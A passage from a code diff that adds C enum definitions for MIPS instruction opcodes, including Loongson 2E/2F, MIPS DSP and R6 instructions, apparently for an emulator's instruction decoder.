OPC_SPECIAL2, + OPC_DIV_G_2F = 0x14 | OPC_SPECIAL2, + OPC_DDIV_G_2F = 0x15 | OPC_SPECIAL2, + OPC_DIVU_G_2F = 0x16 | OPC_SPECIAL2, + OPC_DDIVU_G_2F = 0x17 | OPC_SPECIAL2, + OPC_MOD_G_2F = 0x1c | OPC_SPECIAL2, + OPC_DMOD_G_2F = 0x1d | OPC_SPECIAL2, + OPC_MODU_G_2F = 0x1e | OPC_SPECIAL2, + OPC_DMODU_G_2F = 0x1f | OPC_SPECIAL2, + /* Misc */ + OPC_CLZ = 0x20 | OPC_SPECIAL2, + OPC_CLO = 0x21 | OPC_SPECIAL2, + OPC_DCLZ = 0x24 | OPC_SPECIAL2, + OPC_DCLO = 0x25 | OPC_SPECIAL2, + /* Special */ + OPC_SDBBP = 0x3F | OPC_SPECIAL2, +}; + +/* Special3 opcodes */ +#define MASK_SPECIAL3(op) MASK_OP_MAJOR(op) | (op & 0x3F) + +enum { + OPC_EXT = 0x00 | OPC_SPECIAL3, + OPC_DEXTM = 0x01 | OPC_SPECIAL3, + OPC_DEXTU = 0x02 | OPC_SPECIAL3, + OPC_DEXT = 0x03 | OPC_SPECIAL3, + OPC_INS = 0x04 | OPC_SPECIAL3, + OPC_DINSM = 0x05 | OPC_SPECIAL3, + OPC_DINSU = 0x06 | OPC_SPECIAL3, + OPC_DINS = 0x07 | OPC_SPECIAL3, + OPC_FORK = 0x08 | OPC_SPECIAL3, + OPC_YIELD = 0x09 | OPC_SPECIAL3, + OPC_BSHFL = 0x20 | OPC_SPECIAL3, + OPC_DBSHFL = 0x24 | OPC_SPECIAL3, + OPC_RDHWR = 0x3B | OPC_SPECIAL3, + + /* Loongson 2E */ + OPC_MULT_G_2E = 0x18 | OPC_SPECIAL3, + OPC_MULTU_G_2E = 0x19 | OPC_SPECIAL3, + OPC_DIV_G_2E = 0x1A | OPC_SPECIAL3, + OPC_DIVU_G_2E = 0x1B | OPC_SPECIAL3, + OPC_DMULT_G_2E = 0x1C | OPC_SPECIAL3, + OPC_DMULTU_G_2E = 0x1D | OPC_SPECIAL3, + OPC_DDIV_G_2E = 0x1E | OPC_SPECIAL3, + OPC_DDIVU_G_2E = 0x1F | OPC_SPECIAL3, + OPC_MOD_G_2E = 0x22 | OPC_SPECIAL3, + OPC_MODU_G_2E = 0x23 | OPC_SPECIAL3, + OPC_DMOD_G_2E = 0x26 | OPC_SPECIAL3, + OPC_DMODU_G_2E = 0x27 | OPC_SPECIAL3, + + /* MIPS DSP Load */ + OPC_LX_DSP = 0x0A | OPC_SPECIAL3, + /* MIPS DSP Arithmetic */ + OPC_ADDU_QB_DSP = 0x10 | OPC_SPECIAL3, + OPC_ADDU_OB_DSP = 0x14 | OPC_SPECIAL3, + OPC_ABSQ_S_PH_DSP = 0x12 | OPC_SPECIAL3, + OPC_ABSQ_S_QH_DSP = 0x16 | OPC_SPECIAL3, + /* OPC_ADDUH_QB_DSP is same as OPC_MULT_G_2E. */ + /* OPC_ADDUH_QB_DSP = 0x18 | OPC_SPECIAL3, */ + OPC_CMPU_EQ_QB_DSP = 0x11 | OPC_SPECIAL3, + OPC_CMPU_EQ_OB_DSP = 0x15 | OPC_SPECIAL3, + /* MIPS DSP GPR-Based Shift Sub-class */ + OPC_SHLL_QB_DSP = 0x13 | OPC_SPECIAL3, + OPC_SHLL_OB_DSP = 0x17 | OPC_SPECIAL3, + /* MIPS DSP Multiply Sub-class insns */ + /* OPC_MUL_PH_DSP is same as OPC_ADDUH_QB_DSP. */ + /* OPC_MUL_PH_DSP = 0x18 | OPC_SPECIAL3, */ + OPC_DPA_W_PH_DSP = 0x30 | OPC_SPECIAL3, + OPC_DPAQ_W_QH_DSP = 0x34 | OPC_SPECIAL3, + /* DSP Bit/Manipulation Sub-class */ + OPC_INSV_DSP = 0x0C | OPC_SPECIAL3, + OPC_DINSV_DSP = 0x0D | OPC_SPECIAL3, + /* MIPS DSP Append Sub-class */ + OPC_APPEND_DSP = 0x31 | OPC_SPECIAL3, + OPC_DAPPEND_DSP = 0x35 | OPC_SPECIAL3, + /* MIPS DSP Accumulator and DSPControl Access Sub-class */ + OPC_EXTR_W_DSP = 0x38 | OPC_SPECIAL3, + OPC_DEXTR_W_DSP = 0x3C | OPC_SPECIAL3, + + /* R6 */ + R6_OPC_PREF = 0x35 | OPC_SPECIAL3, + R6_OPC_CACHE = 0x25 | OPC_SPECIAL3, + R6_OPC_LL = 0x36 | OPC_SPECIAL3, + R6_OPC_SC = 0x26 | OPC_SPECIAL3, + R6_OPC_LLD = 0x37 | OPC_SPECIAL3, + R6_OPC_SCD = 0x27 | OPC_SPECIAL3, +}; + +/* BSHFL opcodes */ +#define MASK_BSHFL(op) MASK_SPECIAL3(op) | (op & (0x1F << 6)) + +enum { + OPC_WSBH = (0x02 << 6) | OPC_BSHFL, + OPC_SEB = (0x10 << 6) | OPC_BSHFL, + OPC_SEH = (0x18 << 6) | OPC_BSHFL, + OPC_ALIGN = (0x08 << 6) | OPC_BSHFL, /* 010.bp */ + OPC_ALIGN_END = (0x0B << 6) | OPC_BSHFL, /* 010.00 to 010.11 */ + OPC_BITSWAP = (0x00 << 6) | OPC_BSHFL /* 00000 */ +}; + +/* DBSHFL opcodes */ +#define MASK_DBSHFL(op) MASK_SPECIAL3(op) | (op & (0x1F << 6)) + +enum { + OPC_DSBH = (0x02 << 6) | OPC_DBSHFL, + OPC_DSHD = (0x05 << 6) | OPC_DBSHFL, + OPC_DALIGN = (0x08 << 6) | OPC_DBSHFL, /* 01.bp */ + OPC_DALIGN_END = (0x0F << 6) | OPC_DBSHFL, /* 01.000 to 01.111 */ + OPC_DBITSWAP = (0x00 << 6) | OPC_DBSHFL, /* 00000 */ +}; + +/* MIPS DSP REGIMM opcodes */ +enum { + OPC_BPOSGE32 = (0x1C << 16) | OPC_REGIMM, + OPC_BPOSGE64 = (0x1D << 16) | OPC_REGIMM, +}; + +#define MASK_LX(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +/* MIPS DSP Load */ +enum { + OPC_LBUX = (0x06 << 6) | OPC_LX_DSP, + OPC_LHX = (0x04 << 6) | OPC_LX_DSP, + OPC_LWX = (0x00 << 6) | OPC_LX_DSP, + OPC_LDX = (0x08 << 6) | OPC_LX_DSP, +}; + +#define MASK_ADDU_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP Arithmetic Sub-class */ + OPC_ADDQ_PH = (0x0A << 6) | OPC_ADDU_QB_DSP, + OPC_ADDQ_S_PH = (0x0E << 6) | OPC_ADDU_QB_DSP, + OPC_ADDQ_S_W = (0x16 << 6) | OPC_ADDU_QB_DSP, + OPC_ADDU_QB = (0x00 << 6) | OPC_ADDU_QB_DSP, + OPC_ADDU_S_QB = (0x04 << 6) | OPC_ADDU_QB_DSP, + OPC_ADDU_PH = (0x08 << 6) | OPC_ADDU_QB_DSP, + OPC_ADDU_S_PH = (0x0C << 6) | OPC_ADDU_QB_DSP, + OPC_SUBQ_PH = (0x0B << 6) | OPC_ADDU_QB_DSP, + OPC_SUBQ_S_PH = (0x0F << 6) | OPC_ADDU_QB_DSP, + OPC_SUBQ_S_W = (0x17 << 6) | OPC_ADDU_QB_DSP, + OPC_SUBU_QB = (0x01 << 6) | OPC_ADDU_QB_DSP, + OPC_SUBU_S_QB = (0x05 << 6) | OPC_ADDU_QB_DSP, + OPC_SUBU_PH = (0x09 << 6) | OPC_ADDU_QB_DSP, + OPC_SUBU_S_PH = (0x0D << 6) | OPC_ADDU_QB_DSP, + OPC_ADDSC = (0x10 << 6) | OPC_ADDU_QB_DSP, + OPC_ADDWC = (0x11 << 6) | OPC_ADDU_QB_DSP, + OPC_MODSUB = (0x12 << 6) | OPC_ADDU_QB_DSP, + OPC_RADDU_W_QB = (0x14 << 6) | OPC_ADDU_QB_DSP, + /* MIPS DSP Multiply Sub-class insns */ + OPC_MULEU_S_PH_QBL = (0x06 << 6) | OPC_ADDU_QB_DSP, + OPC_MULEU_S_PH_QBR = (0x07 << 6) | OPC_ADDU_QB_DSP, + OPC_MULQ_RS_PH = (0x1F << 6) | OPC_ADDU_QB_DSP, + OPC_MULEQ_S_W_PHL = (0x1C << 6) | OPC_ADDU_QB_DSP, + OPC_MULEQ_S_W_PHR = (0x1D << 6) | OPC_ADDU_QB_DSP, + OPC_MULQ_S_PH = (0x1E << 6) | OPC_ADDU_QB_DSP, +}; + +#define OPC_ADDUH_QB_DSP OPC_MULT_G_2E +#define MASK_ADDUH_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP Arithmetic Sub-class */ + OPC_ADDUH_QB = (0x00 << 6) | OPC_ADDUH_QB_DSP, + OPC_ADDUH_R_QB = (0x02 << 6) | OPC_ADDUH_QB_DSP, + OPC_ADDQH_PH = (0x08 << 6) | OPC_ADDUH_QB_DSP, + OPC_ADDQH_R_PH = (0x0A << 6) | OPC_ADDUH_QB_DSP, + OPC_ADDQH_W = (0x10 << 6) | OPC_ADDUH_QB_DSP, + OPC_ADDQH_R_W = (0x12 << 6) | OPC_ADDUH_QB_DSP, + OPC_SUBUH_QB = (0x01 << 6) | OPC_ADDUH_QB_DSP, + OPC_SUBUH_R_QB = (0x03 << 6) | OPC_ADDUH_QB_DSP, + OPC_SUBQH_PH = (0x09 << 6) | OPC_ADDUH_QB_DSP, + OPC_SUBQH_R_PH = (0x0B << 6) | OPC_ADDUH_QB_DSP, + OPC_SUBQH_W = (0x11 << 6) | OPC_ADDUH_QB_DSP, + OPC_SUBQH_R_W = (0x13 << 6) | OPC_ADDUH_QB_DSP, + /* MIPS DSP Multiply Sub-class insns */ + OPC_MUL_PH = (0x0C << 6) | OPC_ADDUH_QB_DSP, + OPC_MUL_S_PH = (0x0E << 6) | OPC_ADDUH_QB_DSP, + OPC_MULQ_S_W = (0x16 << 6) | OPC_ADDUH_QB_DSP, + OPC_MULQ_RS_W = (0x17 << 6) | OPC_ADDUH_QB_DSP, +}; + +#define MASK_ABSQ_S_PH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP Arithmetic Sub-class */ + OPC_ABSQ_S_QB = (0x01 << 6) | OPC_ABSQ_S_PH_DSP, + OPC_ABSQ_S_PH = (0x09 << 6) | OPC_ABSQ_S_PH_DSP, + OPC_ABSQ_S_W = (0x11 << 6) | OPC_ABSQ_S_PH_DSP, + OPC_PRECEQ_W_PHL = (0x0C << 6) | OPC_ABSQ_S_PH_DSP, + OPC_PRECEQ_W_PHR = (0x0D << 6) | OPC_ABSQ_S_PH_DSP, + OPC_PRECEQU_PH_QBL = (0x04 << 6) | OPC_ABSQ_S_PH_DSP, + OPC_PRECEQU_PH_QBR = (0x05 << 6) | OPC_ABSQ_S_PH_DSP, + OPC_PRECEQU_PH_QBLA = (0x06 << 6) | OPC_ABSQ_S_PH_DSP, + OPC_PRECEQU_PH_QBRA = (0x07 << 6) | OPC_ABSQ_S_PH_DSP, + OPC_PRECEU_PH_QBL = (0x1C << 6) | OPC_ABSQ_S_PH_DSP, + OPC_PRECEU_PH_QBR = (0x1D << 6) | OPC_ABSQ_S_PH_DSP, + OPC_PRECEU_PH_QBLA = (0x1E << 6) | OPC_ABSQ_S_PH_DSP, + OPC_PRECEU_PH_QBRA = (0x1F << 6) | OPC_ABSQ_S_PH_DSP, + /* DSP Bit/Manipulation Sub-class */ + OPC_BITREV = (0x1B << 6) | OPC_ABSQ_S_PH_DSP, + OPC_REPL_QB = (0x02 << 6) | OPC_ABSQ_S_PH_DSP, + OPC_REPLV_QB = (0x03 << 6) | OPC_ABSQ_S_PH_DSP, + OPC_REPL_PH = (0x0A << 6) | OPC_ABSQ_S_PH_DSP, + OPC_REPLV_PH = (0x0B << 6) | OPC_ABSQ_S_PH_DSP, +}; + +#define MASK_CMPU_EQ_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP Arithmetic Sub-class */ + OPC_PRECR_QB_PH = (0x0D << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_PRECRQ_QB_PH = (0x0C << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_PRECR_SRA_PH_W = (0x1E << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_PRECR_SRA_R_PH_W = (0x1F << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_PRECRQ_PH_W = (0x14 << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_PRECRQ_RS_PH_W = (0x15 << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_PRECRQU_S_QB_PH = (0x0F << 6) | OPC_CMPU_EQ_QB_DSP, + /* DSP Compare-Pick Sub-class */ + OPC_CMPU_EQ_QB = (0x00 << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_CMPU_LT_QB = (0x01 << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_CMPU_LE_QB = (0x02 << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_CMPGU_EQ_QB = (0x04 << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_CMPGU_LT_QB = (0x05 << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_CMPGU_LE_QB = (0x06 << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_CMPGDU_EQ_QB = (0x18 << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_CMPGDU_LT_QB = (0x19 << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_CMPGDU_LE_QB = (0x1A << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_CMP_EQ_PH = (0x08 << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_CMP_LT_PH = (0x09 << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_CMP_LE_PH = (0x0A << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_PICK_QB = (0x03 << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_PICK_PH = (0x0B << 6) | OPC_CMPU_EQ_QB_DSP, + OPC_PACKRL_PH = (0x0E << 6) | OPC_CMPU_EQ_QB_DSP, +}; + +#define MASK_SHLL_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP GPR-Based Shift Sub-class */ + OPC_SHLL_QB = (0x00 << 6) | OPC_SHLL_QB_DSP, + OPC_SHLLV_QB = (0x02 << 6) | OPC_SHLL_QB_DSP, + OPC_SHLL_PH = (0x08 << 6) | OPC_SHLL_QB_DSP, + OPC_SHLLV_PH = (0x0A << 6) | OPC_SHLL_QB_DSP, + OPC_SHLL_S_PH = (0x0C << 6) | OPC_SHLL_QB_DSP, + OPC_SHLLV_S_PH = (0x0E << 6) | OPC_SHLL_QB_DSP, + OPC_SHLL_S_W = (0x14 << 6) | OPC_SHLL_QB_DSP, + OPC_SHLLV_S_W = (0x16 << 6) | OPC_SHLL_QB_DSP, + OPC_SHRL_QB = (0x01 << 6) | OPC_SHLL_QB_DSP, + OPC_SHRLV_QB = (0x03 << 6) | OPC_SHLL_QB_DSP, + OPC_SHRL_PH = (0x19 << 6) | OPC_SHLL_QB_DSP, + OPC_SHRLV_PH = (0x1B << 6) | OPC_SHLL_QB_DSP, + OPC_SHRA_QB = (0x04 << 6) | OPC_SHLL_QB_DSP, + OPC_SHRA_R_QB = (0x05 << 6) | OPC_SHLL_QB_DSP, + OPC_SHRAV_QB = (0x06 << 6) | OPC_SHLL_QB_DSP, + OPC_SHRAV_R_QB = (0x07 << 6) | OPC_SHLL_QB_DSP, + OPC_SHRA_PH = (0x09 << 6) | OPC_SHLL_QB_DSP, + OPC_SHRAV_PH = (0x0B << 6) | OPC_SHLL_QB_DSP, + OPC_SHRA_R_PH = (0x0D << 6) | OPC_SHLL_QB_DSP, + OPC_SHRAV_R_PH = (0x0F << 6) | OPC_SHLL_QB_DSP, + OPC_SHRA_R_W = (0x15 << 6) | OPC_SHLL_QB_DSP, + OPC_SHRAV_R_W = (0x17 << 6) | OPC_SHLL_QB_DSP, +}; + +#define MASK_DPA_W_PH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP Multiply Sub-class insns */ + OPC_DPAU_H_QBL = (0x03 << 6) | OPC_DPA_W_PH_DSP, + OPC_DPAU_H_QBR = (0x07 << 6) | OPC_DPA_W_PH_DSP, + OPC_DPSU_H_QBL = (0x0B << 6) | OPC_DPA_W_PH_DSP, + OPC_DPSU_H_QBR = (0x0F << 6) | OPC_DPA_W_PH_DSP, + OPC_DPA_W_PH = (0x00 << 6) | OPC_DPA_W_PH_DSP, + OPC_DPAX_W_PH = (0x08 << 6) | OPC_DPA_W_PH_DSP, + OPC_DPAQ_S_W_PH = (0x04 << 6) | OPC_DPA_W_PH_DSP, + OPC_DPAQX_S_W_PH = (0x18 << 6) | OPC_DPA_W_PH_DSP, + OPC_DPAQX_SA_W_PH = (0x1A << 6) | OPC_DPA_W_PH_DSP, + OPC_DPS_W_PH = (0x01 << 6) | OPC_DPA_W_PH_DSP, + OPC_DPSX_W_PH = (0x09 << 6) | OPC_DPA_W_PH_DSP, + OPC_DPSQ_S_W_PH = (0x05 << 6) | OPC_DPA_W_PH_DSP, + OPC_DPSQX_S_W_PH = (0x19 << 6) | OPC_DPA_W_PH_DSP, + OPC_DPSQX_SA_W_PH = (0x1B << 6) | OPC_DPA_W_PH_DSP, + OPC_MULSAQ_S_W_PH = (0x06 << 6) | OPC_DPA_W_PH_DSP, + OPC_DPAQ_SA_L_W = (0x0C << 6) | OPC_DPA_W_PH_DSP, + OPC_DPSQ_SA_L_W = (0x0D << 6) | OPC_DPA_W_PH_DSP, + OPC_MAQ_S_W_PHL = (0x14 << 6) | OPC_DPA_W_PH_DSP, + OPC_MAQ_S_W_PHR = (0x16 << 6) | OPC_DPA_W_PH_DSP, + OPC_MAQ_SA_W_PHL = (0x10 << 6) | OPC_DPA_W_PH_DSP, + OPC_MAQ_SA_W_PHR = (0x12 << 6) | OPC_DPA_W_PH_DSP, + OPC_MULSA_W_PH = (0x02 << 6) | OPC_DPA_W_PH_DSP, +}; + +#define MASK_INSV(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* DSP Bit/Manipulation Sub-class */ + OPC_INSV = (0x00 << 6) | OPC_INSV_DSP, +}; + +#define MASK_APPEND(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP Append Sub-class */ + OPC_APPEND = (0x00 << 6) | OPC_APPEND_DSP, + OPC_PREPEND = (0x01 << 6) | OPC_APPEND_DSP, + OPC_BALIGN = (0x10 << 6) | OPC_APPEND_DSP, +}; + +#define MASK_EXTR_W(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP Accumulator and DSPControl Access Sub-class */ + OPC_EXTR_W = (0x00 << 6) | OPC_EXTR_W_DSP, + OPC_EXTR_R_W = (0x04 << 6) | OPC_EXTR_W_DSP, + OPC_EXTR_RS_W = (0x06 << 6) | OPC_EXTR_W_DSP, + OPC_EXTR_S_H = (0x0E << 6) | OPC_EXTR_W_DSP, + OPC_EXTRV_S_H = (0x0F << 6) | OPC_EXTR_W_DSP, + OPC_EXTRV_W = (0x01 << 6) | OPC_EXTR_W_DSP, + OPC_EXTRV_R_W = (0x05 << 6) | OPC_EXTR_W_DSP, + OPC_EXTRV_RS_W = (0x07 << 6) | OPC_EXTR_W_DSP, + OPC_EXTP = (0x02 << 6) | OPC_EXTR_W_DSP, + OPC_EXTPV = (0x03 << 6) | OPC_EXTR_W_DSP, + OPC_EXTPDP = (0x0A << 6) | OPC_EXTR_W_DSP, + OPC_EXTPDPV = (0x0B << 6) | OPC_EXTR_W_DSP, + OPC_SHILO = (0x1A << 6) | OPC_EXTR_W_DSP, + OPC_SHILOV = (0x1B << 6) | OPC_EXTR_W_DSP, + OPC_MTHLIP = (0x1F << 6) | OPC_EXTR_W_DSP, + OPC_WRDSP = (0x13 << 6) | OPC_EXTR_W_DSP, + OPC_RDDSP = (0x12 << 6) | OPC_EXTR_W_DSP, +}; + +#define MASK_ABSQ_S_QH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP Arithmetic Sub-class */ + OPC_PRECEQ_L_PWL = (0x14 << 6) | OPC_ABSQ_S_QH_DSP, + OPC_PRECEQ_L_PWR = (0x15 << 6) | OPC_ABSQ_S_QH_DSP, + OPC_PRECEQ_PW_QHL = (0x0C << 6) | OPC_ABSQ_S_QH_DSP, + OPC_PRECEQ_PW_QHR = (0x0D << 6) | OPC_ABSQ_S_QH_DSP, + OPC_PRECEQ_PW_QHLA = (0x0E << 6) | OPC_ABSQ_S_QH_DSP, + OPC_PRECEQ_PW_QHRA = (0x0F << 6) | OPC_ABSQ_S_QH_DSP, + OPC_PRECEQU_QH_OBL = (0x04 << 6) | OPC_ABSQ_S_QH_DSP, + OPC_PRECEQU_QH_OBR = (0x05 << 6) | OPC_ABSQ_S_QH_DSP, + OPC_PRECEQU_QH_OBLA = (0x06 << 6) | OPC_ABSQ_S_QH_DSP, + OPC_PRECEQU_QH_OBRA = (0x07 << 6) | OPC_ABSQ_S_QH_DSP, + OPC_PRECEU_QH_OBL = (0x1C << 6) | OPC_ABSQ_S_QH_DSP, + OPC_PRECEU_QH_OBR = (0x1D << 6) | OPC_ABSQ_S_QH_DSP, + OPC_PRECEU_QH_OBLA = (0x1E << 6) | OPC_ABSQ_S_QH_DSP, + OPC_PRECEU_QH_OBRA = (0x1F << 6) | OPC_ABSQ_S_QH_DSP, + OPC_ABSQ_S_OB = (0x01 << 6) | OPC_ABSQ_S_QH_DSP, + OPC_ABSQ_S_PW = (0x11 << 6) | OPC_ABSQ_S_QH_DSP, + OPC_ABSQ_S_QH = (0x09 << 6) | OPC_ABSQ_S_QH_DSP, + /* DSP Bit/Manipulation Sub-class */ + OPC_REPL_OB = (0x02 << 6) | OPC_ABSQ_S_QH_DSP, + OPC_REPL_PW = (0x12 << 6) | OPC_ABSQ_S_QH_DSP, + OPC_REPL_QH = (0x0A << 6) | OPC_ABSQ_S_QH_DSP, + OPC_REPLV_OB = (0x03 << 6) | OPC_ABSQ_S_QH_DSP, + OPC_REPLV_PW = (0x13 << 6) | OPC_ABSQ_S_QH_DSP, + OPC_REPLV_QH = (0x0B << 6) | OPC_ABSQ_S_QH_DSP, +}; + +#define MASK_ADDU_OB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP Multiply Sub-class insns */ + OPC_MULEQ_S_PW_QHL = (0x1C << 6) | OPC_ADDU_OB_DSP, + OPC_MULEQ_S_PW_QHR = (0x1D << 6) | OPC_ADDU_OB_DSP, + OPC_MULEU_S_QH_OBL = (0x06 << 6) | OPC_ADDU_OB_DSP, + OPC_MULEU_S_QH_OBR = (0x07 << 6) | OPC_ADDU_OB_DSP, + OPC_MULQ_RS_QH = (0x1F << 6) | OPC_ADDU_OB_DSP, + /* MIPS DSP Arithmetic Sub-class */ + OPC_RADDU_L_OB = (0x14 << 6) | OPC_ADDU_OB_DSP, + OPC_SUBQ_PW = (0x13 << 6) | OPC_ADDU_OB_DSP, + OPC_SUBQ_S_PW = (0x17 << 6) | OPC_ADDU_OB_DSP, + OPC_SUBQ_QH = (0x0B << 6) | OPC_ADDU_OB_DSP, + OPC_SUBQ_S_QH = (0x0F << 6) | OPC_ADDU_OB_DSP, + OPC_SUBU_OB = (0x01 << 6) | OPC_ADDU_OB_DSP, + OPC_SUBU_S_OB = (0x05 << 6) | OPC_ADDU_OB_DSP, + OPC_SUBU_QH = (0x09 << 6) | OPC_ADDU_OB_DSP, + OPC_SUBU_S_QH = (0x0D << 6) | OPC_ADDU_OB_DSP, + OPC_SUBUH_OB = (0x19 << 6) | OPC_ADDU_OB_DSP, + OPC_SUBUH_R_OB = (0x1B << 6) | OPC_ADDU_OB_DSP, + OPC_ADDQ_PW = (0x12 << 6) | OPC_ADDU_OB_DSP, + OPC_ADDQ_S_PW = (0x16 << 6) | OPC_ADDU_OB_DSP, + OPC_ADDQ_QH = (0x0A << 6) | OPC_ADDU_OB_DSP, + OPC_ADDQ_S_QH = (0x0E << 6) | OPC_ADDU_OB_DSP, + OPC_ADDU_OB = (0x00 << 6) | OPC_ADDU_OB_DSP, + OPC_ADDU_S_OB = (0x04 << 6) | OPC_ADDU_OB_DSP, + OPC_ADDU_QH = (0x08 << 6) | OPC_ADDU_OB_DSP, + OPC_ADDU_S_QH = (0x0C << 6) | OPC_ADDU_OB_DSP, + OPC_ADDUH_OB = (0x18 << 6) | OPC_ADDU_OB_DSP, + OPC_ADDUH_R_OB = (0x1A << 6) | OPC_ADDU_OB_DSP, +}; + +#define MASK_CMPU_EQ_OB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* DSP Compare-Pick Sub-class */ + OPC_CMP_EQ_PW = (0x10 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMP_LT_PW = (0x11 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMP_LE_PW = (0x12 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMP_EQ_QH = (0x08 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMP_LT_QH = (0x09 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMP_LE_QH = (0x0A << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMPGDU_EQ_OB = (0x18 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMPGDU_LT_OB = (0x19 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMPGDU_LE_OB = (0x1A << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMPGU_EQ_OB = (0x04 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMPGU_LT_OB = (0x05 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMPGU_LE_OB = (0x06 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMPU_EQ_OB = (0x00 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMPU_LT_OB = (0x01 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_CMPU_LE_OB = (0x02 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_PACKRL_PW = (0x0E << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_PICK_OB = (0x03 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_PICK_PW = (0x13 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_PICK_QH = (0x0B << 6) | OPC_CMPU_EQ_OB_DSP, + /* MIPS DSP Arithmetic Sub-class */ + OPC_PRECR_OB_QH = (0x0D << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_PRECR_SRA_QH_PW = (0x1E << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_PRECR_SRA_R_QH_PW = (0x1F << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_PRECRQ_OB_QH = (0x0C << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_PRECRQ_PW_L = (0x1C << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_PRECRQ_QH_PW = (0x14 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_PRECRQ_RS_QH_PW = (0x15 << 6) | OPC_CMPU_EQ_OB_DSP, + OPC_PRECRQU_S_OB_QH = (0x0F << 6) | OPC_CMPU_EQ_OB_DSP, +}; + +#define MASK_DAPPEND(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* DSP Append Sub-class */ + OPC_DAPPEND = (0x00 << 6) | OPC_DAPPEND_DSP, + OPC_PREPENDD = (0x03 << 6) | OPC_DAPPEND_DSP, + OPC_PREPENDW = (0x01 << 6) | OPC_DAPPEND_DSP, + OPC_DBALIGN = (0x10 << 6) | OPC_DAPPEND_DSP, +}; + +#define MASK_DEXTR_W(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP Accumulator and DSPControl Access Sub-class */ + OPC_DMTHLIP = (0x1F << 6) | OPC_DEXTR_W_DSP, + OPC_DSHILO = (0x1A << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTP = (0x02 << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTPDP = (0x0A << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTPDPV = (0x0B << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTPV = (0x03 << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTR_L = (0x10 << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTR_R_L = (0x14 << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTR_RS_L = (0x16 << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTR_W = (0x00 << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTR_R_W = (0x04 << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTR_RS_W = (0x06 << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTR_S_H = (0x0E << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTRV_L = (0x11 << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTRV_R_L = (0x15 << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTRV_RS_L = (0x17 << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTRV_S_H = (0x0F << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTRV_W = (0x01 << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTRV_R_W = (0x05 << 6) | OPC_DEXTR_W_DSP, + OPC_DEXTRV_RS_W = (0x07 << 6) | OPC_DEXTR_W_DSP, + OPC_DSHILOV = (0x1B << 6) | OPC_DEXTR_W_DSP, +}; + +#define MASK_DINSV(op) (MASK_SPECIAL3(op) | (op & 